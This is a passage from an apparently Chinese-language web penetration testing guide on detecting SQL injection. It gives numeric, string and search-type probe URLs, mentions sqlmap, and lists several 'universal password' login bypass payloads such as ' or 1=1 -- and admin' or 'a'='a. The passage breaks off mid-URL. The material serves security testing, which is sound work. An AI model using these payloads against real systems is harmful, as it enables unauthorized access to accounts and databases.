4、 待测目标存在参数输入,假设为name=value
检测方法:
一、 通过web漏洞扫描工具进行对网站爬虫后得到的所有链接进行检测,或者手工判断是否存在注入点,一旦确认存在漏洞,可利用自动化工具sqlmap去尝试注入。几种常见的判断方法:
1、 数字型。测试方法:
http://host/test.php?id=100 and 1=1 返回成功
http://host/test.php?id=100 and 1=2 返回失败
2、 字符型。测试方法:
http://host/test.php?name=rainman ’ and ‘1’=‘1 返回成功
http://host/test.php?name=rainman ’ and ‘1’=‘2 返回失败
3、 搜索型。搜索型注入:简单的判断搜索型注入漏洞存在不存在的办法是:
3.1)先搜索('),如果出错,说明 90%存在这个漏洞。
3.2)然后搜索(%),如果正常返回,说明 95%有洞了。
3.3)然后再搜索一个关键字,比如(2006)吧,正常返回所有 2006 相关的信息。
3.4)再搜索(2006%‘and 1=1 and ‘%’=’)和(2006%‘and 1=2 and ‘%’=’)
4、 绕过验证(常见的为管理登陆)也称万能密码
(1) 用户名输入: ‘ or 1=1 or ‘ 密码:任意
(2)Admin’ - -(或‘ or 1=1 or ‘ - -)(admin or 1=1 --) (MS SQL)(直接输入用户名,不进行密码验证)(3)用户名输入:admin 密码输入:’ or ‘1’=’1 也可以
(4) 用户名输入:admin’ or ‘a’=‘a 密码输入:任意
(5) 用户名输入:‘ or 1=1 - -
(6) 用户名输入:admin‘ or 1=1 - - 密码输入:任意
(7) 用户名输入:1’or’1’=‘1’or’1’='1 密码输入:任意
5、 不同的 SQL 服务器连结字符串的语法不同,比如 MS SQL Server 使用
符号+来连结字符串,而 Oracle 使用符号||来连结:
http://host/test.